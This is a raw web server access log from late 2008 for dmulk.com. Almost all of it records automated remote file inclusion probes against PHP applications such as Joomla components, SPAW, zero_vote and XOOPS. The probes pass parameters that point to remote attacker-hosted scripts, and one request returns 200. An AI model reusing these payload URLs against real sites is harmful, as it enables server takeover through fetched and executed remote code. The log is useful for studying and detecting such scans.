94.23.10.29 - - [29/Nov/2008:10:26:58 -0800] "GET /logs/access_080716.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:26:58 -0800] "GET /logs/access_080330.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:26:58 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.112 - - [29/Nov/2008:10:27:06 -0800] "GET /blog/index.php/2008/08/ HTTP/1.0" 200 77086 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:27:18 -0800] "GET /logs/access_080522.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:27:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:27:32 -0800] "GET /logs/access_080504.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.49.188.178 - - [29/Nov/2008:10:27:48 -0800] "GET /index.phpmain.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 7984 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:27:52 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:27:52 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:27:59 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:27:59 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:10:28:08 -0800] "GET /logs/home.php?pagina=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:28:09 -0800] "GET /logs/access_080522.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:10:28:09 -0800] "GET /home.php?pagina=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:28:09 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:28:28 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:28:28 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:28:30 -0800] "GET /logs/access_080504.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:34 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:34 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:35 -0800] "GET /skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:28:38 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:28:39 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:10:28:43 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:10:28:43 -0800] "GET /skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:10:28:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:10:28:43 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:28:46 -0800] "GET /logs/access_080522.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:28:47 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:28:47 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:28:47 -0800] "GET /logs/access_080504.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:49 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:49 -0800] "GET /skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:28:49 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.221.119.3 - - [29/Nov/2008:10:28:58 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
193.221.119.3 - - [29/Nov/2008:10:28:58 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:29:00 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:29:03 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:29:13 -0800] "GET /skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:29:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:29:13 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:29:14 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:10:29:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:10:29:29 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:10:29:29 -0800] "GET /skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:29:54 -0800] "GET /skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:29:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:29:54 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:10:29:57 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:30:01 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:30:08 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.254.72.131 - - [29/Nov/2008:10:30:09 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://demo.pac-werbeagentur.de/lhf/website/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:30:11 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.254.72.131 - - [29/Nov/2008:10:30:15 -0800] "GET /skin/zero_vote/error.php?dir=http://demo.pac-werbeagentur.de/lhf/website/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:33 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:33 -0800] "GET /skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:33 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:34 -0800] "GET /skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [29/Nov/2008:10:30:34 -0800] "GET /logs/access_080919.log//modules/Forums/admin/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:34 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [29/Nov/2008:10:30:35 -0800] "GET /modules/Forums/admin/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:10:30:35 -0800] "GET /logs/access_080705.log//skin/zero_vote/error.php?dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [29/Nov/2008:10:30:35 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:30:42 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:30:42 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:10:30:49 -0800] "GET /skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:10:30:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:31:02 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:31:02 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:31:02 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:31:24 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:31:24 -0800] "GET /errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:31:24 -0800] "GET /logs/access_080408.log/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:31:33 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:31:35 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 200 95499 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:31:49 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:31:49 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:32:16 -0800] "GET /logs/access_080620.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:32:26 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:32:26 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:29 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:32:31 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:35 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:35 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:32:35 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:10:32:38 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:32:52 -0800] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:32:52 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:32:52 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:32:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:32:56 -0800] "GET /skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:32:56 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:33:01 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:33:01 -0800] "GET /skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:33:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:33:01 -0800] "GET /logs/access_080103.log%20%20//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:33:02 -0800] "GET /logs/access_080620.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:33:04 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:33:05 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:33:05 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:33:10 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:33:11 -0800] "GET /logs/access_080705.log%20%20//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:10:33:16 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
